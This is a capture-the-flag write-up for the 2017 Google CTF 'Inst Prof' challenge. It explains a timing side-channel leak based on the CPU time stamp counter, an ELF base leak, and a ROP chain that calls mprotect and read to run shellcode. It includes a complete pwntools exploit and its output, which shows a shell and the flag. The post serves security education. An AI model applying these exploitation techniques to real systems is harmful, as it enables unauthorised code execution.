Sunday, July 2, 2017

Google CTF – Pwnables - Inst Prof

Summary of Exploitation:

Leak CPU Time Stamp Counter (TSC)
Predict TSC values
Leak ELF base address using predicted TSC values
Return into read_n function
ROP payload of mprotect + read to execute shellcode

Analysis:

The provided binary is a 64-bit ELF with PIE and NX enabled. It works as follows:

• The main function sets a 30-second alarm and invokes the do_test function in an infinite loop; each do_test call performs the steps below
• Allocate a memory page using mmap with PROT_READ | PROT_WRITE permission
• Copy a template code which executes 4 NOPs in a loop 0x1000 times
• Replace NOP with 4 bytes of user supplied code
• Make the page PROT_READ | PROT_EXEC using mprotect
• Measure the TSC before execution of shellcode
• Execute the shellcode
• Measure the TSC after execution of shellcode
• Output the difference in TSC
• Free the page using munmap and execute the loop again
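
Because exactly 4 bytes of the template are replaced, every instruction sent has to fill one 4-byte slot. A minimal sketch of a padding helper, assuming shorter encodings are filled with single-byte NOPs (0x90); the name pad_to_slot is hypothetical and appears in neither the binary nor the exploit:

```python
NOP = b"\x90"
SLOT_SIZE = 4  # the binary replaces exactly 4 NOP bytes per do_test call


def pad_to_slot(code, slot_size=SLOT_SIZE):
    """Pad machine code with NOPs so that it fills one slot exactly."""
    if len(code) > slot_size:
        raise ValueError("instruction does not fit in %d bytes" % slot_size)
    return code + NOP * (slot_size - len(code))


# xor r12, r12 encodes to 3 bytes (4d 31 e4), so one NOP is appended.
XOR_R12_R12 = b"\x4d\x31\xe4"
slot = pad_to_slot(XOR_R12_R12)
print(len(slot))
```

This is the same effect as assembling "xor r12, r12; nop" with pwntools, as the snippets later in this post do.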

Leaking CPU Time Stamp Counter (TSC):
.text:0000000000000B08      rdtsc              ; get Time Stamp Counter 
.text:0000000000000B0A      shl     rdx, 20h
.text:0000000000000B0E      mov     r12, rax
.text:0000000000000B11      xor     eax, eax
.text:0000000000000B13      or      r12, rdx   ; load TSC values in RDX & RAX to R12
.text:0000000000000B16      call    rbx        ; execute the shellcode
.text:0000000000000B18      rdtsc              ; get Time Stamp Counter
.text:0000000000000B1A      mov     edi, 1         
.text:0000000000000B1F      shl     rdx, 20h
.text:0000000000000B23      lea     rsi, [rbp+buf] 
.text:0000000000000B27      or      rdx, rax
.text:0000000000000B2A      sub     rdx, r12   ; Find the difference in TSC
.text:0000000000000B2D      mov     [rbp+buf], rdx
.text:0000000000000B31      mov     edx, 8         
.text:0000000000000B36      call    _write     ; Output the result
The TSC value is stored in R12 before the shellcode executes and is later used to compute the difference:
.text:0000000000000B2A                 sub      rdx, r12
If the 4-byte user-supplied code is xor r12, r12 (padded with a nop), R12 is zeroed, so the program outputs the entire RDX value (i.e. the second TSC reading) and moves on to the next loop iteration
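
The arithmetic behind this leak can be sketched as follows. The function name reported_value and the tsc_before value are illustrative assumptions; only the subtraction itself comes from the disassembly above:

```python
MASK64 = (1 << 64) - 1


def reported_value(tsc_after, r12):
    """Value the program writes: (second rdtsc - R12), truncated to 64 bits."""
    return (tsc_after - r12) & MASK64


tsc_before = 0x244baebdaa000  # illustrative first rdtsc reading
tsc_after = 0x244baebdaa75f   # illustrative second rdtsc reading

normal = reported_value(tsc_after, tsc_before)  # R12 untouched: cycle count
leaked = reported_value(tsc_after, 0)           # after xor r12, r12: full TSC

print("normal = 0x%x, leaked = 0x%x" % (normal, leaked))
```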

Idea to leak pointers:

Load register R12 with a pointer fetched from the stack using mov r12, [rbp-offset]. The program then outputs (TSC - pointer loaded into R12). The problem is that both the TSC and the pointer in R12 are unknown values. However, we know the TSC values leaked in previous loop iterations, so let's try to predict the current TSC value from them.

The TSC is measured under the following conditions:

• The initial executions of do_test take more CPU cycles due to cache effects
• Executing the do_test function multiple times reduces the CPU cycles between loops. This is cache warming
• Do not read/write data per loop. Send the whole payload at once and read the output only after everything has executed, so that no iteration blocks on I/O

Consider the code snippet below:
payload = ''
for _ in range(16):
    payload += asm("xor r12, r12; nop")

r.send(payload)
tsc_values = r.recv(8 * 16)

first_tsc = u64(tsc_values[0:8])
prev_tsc  = first_tsc

print("[+] TSC = 0x%x" % (first_tsc))

for i in range(1, 16):
    curr_tsc = u64(tsc_values[i*8:(i+1)*8])
    diff_tsc = curr_tsc - prev_tsc
    prev_tsc = curr_tsc
    print("[+] TSC = 0x%x, diff = 0x%x" % (curr_tsc, diff_tsc))
$ python tsc_leak.py 
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[+] TSC = 0x244baebdaa75f
[+] TSC = 0x244baebdc57b4, diff = 0x1b055
[+] TSC = 0x244baebdcb015, diff = 0x5861
[+] TSC = 0x244baebdcfdb8, diff = 0x4da3
[+] TSC = 0x244baebdd47d8, diff = 0x4a20
[+] TSC = 0x244baebdd9272, diff = 0x4a9a
[+] TSC = 0x244baebdddd3b, diff = 0x4ac9
[+] TSC = 0x244baebde2850, diff = 0x4b15
[+] TSC = 0x244baebde7353, diff = 0x4b03
[+] TSC = 0x244baebdebf1b, diff = 0x4bc8
[+] TSC = 0x244baebdf0a4d, diff = 0x4b32
[+] TSC = 0x244baebdf56d3, diff = 0x4c86
[+] TSC = 0x244baebdfa1ec, diff = 0x4b19
[+] TSC = 0x244baebdfecdc, diff = 0x4af0
[+] TSC = 0x244baebe037b3, diff = 0x4ad7
[+] TSC = 0x244baebe08c23, diff = 0x5470
After the first few executions with higher CPU cycle counts, the differences come down and become more regular, i.e. the next TSC value can be predicted with good accuracy, except for some of the least significant bits
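
To put a number on "good accuracy", the sketch below replays the 16 TSC values from the run above and checks how far a simple linear prediction (previous value plus previous difference) lands from the real value. Treating the first four samples as warm-up is an assumption made for this illustration:

```python
# TSC values copied from the tsc_leak.py output above.
samples = [
    0x244baebdaa75f, 0x244baebdc57b4, 0x244baebdcb015, 0x244baebdcfdb8,
    0x244baebdd47d8, 0x244baebdd9272, 0x244baebdddd3b, 0x244baebde2850,
    0x244baebde7353, 0x244baebdebf1b, 0x244baebdf0a4d, 0x244baebdf56d3,
    0x244baebdfa1ec, 0x244baebdfecdc, 0x244baebe037b3, 0x244baebe08c23,
]

deltas = [b - a for a, b in zip(samples, samples[1:])]

# Predict sample i as samples[i-1] + (samples[i-1] - samples[i-2]).
errors = [
    samples[i] - (2 * samples[i - 1] - samples[i - 2])
    for i in range(2, len(samples))
]

steady = errors[2:]  # predictions for samples 4..15, after warm-up
worst = max(abs(e) for e in steady)
print("worst steady-state error = 0x%x (%d bits)" % (worst, worst.bit_length()))
```

For this particular run the worst error after warm-up fits in 12 bits, so only the low bits of a predicted TSC are in doubt.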

Leaking ELF base address:

To leak the ELF base address, load the R12 register with the value at rbp-0x28. This holds the return address pointing to

.text:0000000000000B18                 rdtsc
The program now outputs (TSC - pointer loaded into R12). Subtracting that output from the predicted TSC value yields the pointer in R12. The last few bits might be inaccurate. However, the last 12 bits of the pointer are known, since page alignment leaves them unrandomized.

Can the least significant bits also be leaked reliably using this technique? Yes, by reading the pointer in two chunks, i.e. instead of reading from rbp-0x28 as below:
gdb-peda$ x/gx $rbp-0x28
0x7fffffffde48: 0x0000555555554b18
Read the pointer twice at unaligned offsets, so that each half lands in the most significant bytes of R12. Of the 8-byte address, the 2 most significant bytes are 0x00
gdb-peda$ x/gx $rbp-0x2a
0x7fffffffde46: 0x555555554b180000
gdb-peda$ x/gx $rbp-0x2d
0x7fffffffde43: 0x554b180000000000
Since the most significant bytes of the TSC can be predicted reliably, unlike the least significant bytes, this results in a reliable info leak. Below is the code:
for _ in range(16):
    payload += asm("xor r12, r12; nop")

# measure the TSC difference between consecutive do_test runs to predict the next rdtsc output

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2d]")  # leak 3 lsb bytes, unaligned read

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2a]")  # leak 3 msb bytes, unaligned read

print("[+] warming up cache for leaking pointers")
r.send(payload)
r.recv(16 * 8)

# leaking pointers in two chunks to make up for less predictable LSB values of TSC

t1 = u64(r.recv(8))       # leak lsb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))
print("[+] leaked TSC value = 0x%x" % (t1))

pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

t1 = u64(r.recv(8))       # leak msb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))

pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_msb = 0x%x" % (pointer_msb))

# .text:0000000000000B18    rdtsc
pointer = (pointer_msb << 24) | pointer_lsb
print("[+] leaked address = 0x%x" % (pointer))

elf_base = pointer & 0xfffffffffffff000
print("[+] ELF base address = 0x%x" % (elf_base))
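
The two-chunk trick can be checked offline. The sketch below emulates the unaligned reads on the gdb values shown earlier and recovers each 3-byte chunk from a deliberately imprecise TSC prediction. The helper names, the TSC value and the prediction error are illustrative assumptions, as is the zero padding below the pointer (it matches the gdb dump, not necessarily the remote stack):

```python
import struct

MASK64 = (1 << 64) - 1
POINTER = 0x0000555555554b18  # value at rbp-0x28 in the gdb session

# 8 zero bytes below the slot (as in the gdb dump), then the
# little-endian pointer itself.
stack = b"\x00" * 8 + struct.pack("<Q", POINTER)
SLOT = 8  # index of rbp-0x28 inside `stack`


def unaligned_read(bytes_below):
    """Emulate mov r12, [rbp-0x28-bytes_below]."""
    start = SLOT - bytes_below
    return struct.unpack("<Q", stack[start:start + 8])[0]


def recover_chunk(r12, tsc, prediction_error):
    """Top 24 bits of (predicted TSC - program output)."""
    reported = (tsc - r12) & MASK64     # what the binary prints
    predicted = tsc + prediction_error  # attacker's estimate of the TSC
    return ((predicted - reported) & MASK64) >> 40


tsc = 0x244baebe08c23  # illustrative TSC value
low = recover_chunk(unaligned_read(5), tsc, 0x999)   # rbp-0x2d
high = recover_chunk(unaligned_read(2), tsc, 0x999)  # rbp-0x2a
pointer = (high << 24) | low
print("recovered pointer = 0x%x" % pointer)
```

In this model an overshooting prediction is absorbed by the 40 low bits that get shifted away. A prediction that undershoots borrows from the chunk and gives a value one too small; for the low chunk, the known last 12 bits (0xb18) make that easy to spot.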
Gaining RIP control using relative write w.r.t RBP:

Once the ELF base address is leaked, a small ROP payload is set up on the stack to invoke the read_n function, using a series of mov operations:
# payload to return into read_n function

payload  = asm("mov r13, rsp; ret")
payload += asm("mov r14, [r13]")       # .text:0000000000000B18 rdtsc
payload += asm("mov r14b, 0xc3; ret")  # modify LSB to get pop rdi gadget
payload += asm("mov r15, [rbp-0x48]")  # .text:0000000000000AA3 mov [rbx-1], al
payload += asm("mov r15b, 0x80; ret")  # modify LSB to get read_n address
payload += asm("mov [rbp+24], r15")    # return into read_n
payload += asm("mov [rbp+16], r13")    # stack address as argument for read_n
payload += asm("mov [rbp+8], r14")     # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
r.send(payload)
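
The "modify LSB" steps work because both targets sit in the same 256-byte window as a pointer already on the stack. A small sketch of that address arithmetic, using the ELF base from the sample solver run; with_low_byte and stack_arg are hypothetical names and values used only for illustration:

```python
def with_low_byte(address, low_byte):
    """Replace the least significant byte, like mov r14b / mov r15b do."""
    return (address & ~0xff) | low_byte


elf_base = 0x55636a173000     # ELF base from the sample solver output
ret_addr = elf_base + 0xb18   # return address into do_test (rdtsc)
saved_ptr = elf_base + 0xaa3  # code pointer read from rbp-0x48

pop_rdi = with_low_byte(ret_addr, 0xc3)  # mov r14b, 0xc3 -> pop rdi; ret
read_n = with_low_byte(saved_ptr, 0x80)  # mov r15b, 0x80 -> read_n

stack_arg = 0x7fffffffde00  # placeholder for the RSP value saved in r13

# Values written to [rbp+8], [rbp+16] and [rbp+24] respectively.
chain = [pop_rdi, stack_arg, read_n]
print(["0x%x" % value for value in chain])
```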
RSI already holds the value 0x1000 due to the program state, hence the call becomes read_n(RSP, 0x1000). read_n reads a second ROP payload onto the stack, which then executes and performs the operations below:
mprotect(elf_base, 0x1000, 7)
read(0, elf_base, 0x100)
jmp elf_base
$ python solver.py 
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[+] warming up cache for leaking pointers
[+] leaked TSC value = 0x30aba58d51eb8
[+] pointer_lsb = 0x173b18
[+] pointer_msb = 0x55636a
[+] leaked address = 0x55636a173b18
[+] ELF base address = 0x55636a173000
[+] sending ROP payload
[*] Switching to interactive mode
$ id
uid=1337(user) gid=1337(user) groups=1337(user)
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}
Here is the full exploit:
from pwn import *

host = 'inst-prof.ctfcompetition.com'
port = 1337

context.arch = 'amd64'

if len(sys.argv) == 2: 
    r = process('./inst_prof')
else: 
    r = remote(host, port)
r.recvline()

# warmup the cache for the leaking pointers

payload = ''
for _ in range(16):
    payload += asm("xor r12, r12; nop")

# measure the TSC difference between consecutive do_test runs to predict the next rdtsc output

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2d]")  # leak 3 lsb bytes, unaligned read

payload += asm("xor r12, r12; nop")
payload += asm("xor r12, r12; nop")
payload += asm("mov r12, [rbp-0x2a]")  # leak 3 msb bytes, unaligned read

print("[+] warming up cache for leaking pointers")
r.send(payload)
r.recv(16 * 8)

# leaking pointers in two chunks to make up for less predictable LSB values of TSC

t1 = u64(r.recv(8))       # leak lsb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))
print("[+] leaked TSC value = 0x%x" % (t1))

pointer_lsb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_lsb = 0x%x" % (pointer_lsb))

t1 = u64(r.recv(8))       # leak msb bytes
t2 = u64(r.recv(8))
diff = t2 - t1
expected_value = t2 + diff
t3 = u64(r.recv(8))

pointer_msb = ((expected_value - t3) & 0xffffffffffffffff) >> 40
print("[+] pointer_msb = 0x%x" % (pointer_msb))

# .text:0000000000000B18    rdtsc
pointer = (pointer_msb << 24) | pointer_lsb
print("[+] leaked address = 0x%x" % (pointer))

elf_base = pointer & 0xfffffffffffff000
print("[+] ELF base address = 0x%x" % (elf_base))

# payload to return into read_n function

payload  = asm("mov r13, rsp; ret")
payload += asm("mov r14, [r13]")       # .text:0000000000000B18 rdtsc
payload += asm("mov r14b, 0xc3; ret")  # pop rdi; ret
payload += asm("mov r15, [rbp-0x48]")  # .text:0000000000000AA3 mov     [rbx-1], al
payload += asm("mov r15b, 0x80; ret")  # read_n address
payload += asm("mov [rbp+24], r15")    # return into read_n
payload += asm("mov [rbp+16], r13")    # stack address
payload += asm("mov [rbp+8], r14")     # overwrite RIP with pop rdi; read_n(stack_address, 0x1000)
r.send(payload) 
r.recv(8 * 8)

# send ROP payload using leaked ELF base address
print("[+] sending ROP payload")

payload  = "A" * 72
payload += p64(elf_base + 0xbba)  # 0x00000bba: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 
payload += p64(0)
payload += p64(1)
payload += p64(elf_base + 0x0202028)  # GOT address of alarm as NOP for call   QWORD PTR [r12+rbx*8]
payload += p64(0x7)                   # rdx 
payload += p64(0x1000)                # rsi
payload += p64(0x4545454545454545)    # rdi
payload += p64(elf_base + 0xba0)      # __libc_csu_init
payload += "F"* 8

payload += p64(0)
payload += p64(1)
payload += p64(elf_base + 0x0202028)  # GOT address of alarm as NOP for call   QWORD PTR [r12+rbx*8]
payload += p64(0x100)                 # rdx, load registers for read
payload += p64(elf_base)              # rsi
payload += p64(0)                     # rdi

# make ELF header RWX
payload += p64(elf_base + 0xbc3)      # pop rdi; ret
payload += p64(elf_base)              # rdi
payload += p64(elf_base + 0x820)      # mprotect(elf_base, 0x1000, 7)

# read into ELF header
payload += p64(elf_base + 0xba0)      # __libc_csu_init
payload += "G" * 56
payload += p64(elf_base + 0x7e0)      # read(0, elf_base, 0x100)

# return to shellcode
payload += p64(elf_base)
payload += p64(0xdeadbeef00000000)

payload += "B" * (4096 - len(payload))
r.send(payload)

sc  = asm(shellcraft.amd64.linux.syscall('SYS_alarm', 0))
sc += asm(shellcraft.amd64.linux.sh())
r.sendline(sc)
r.interactive()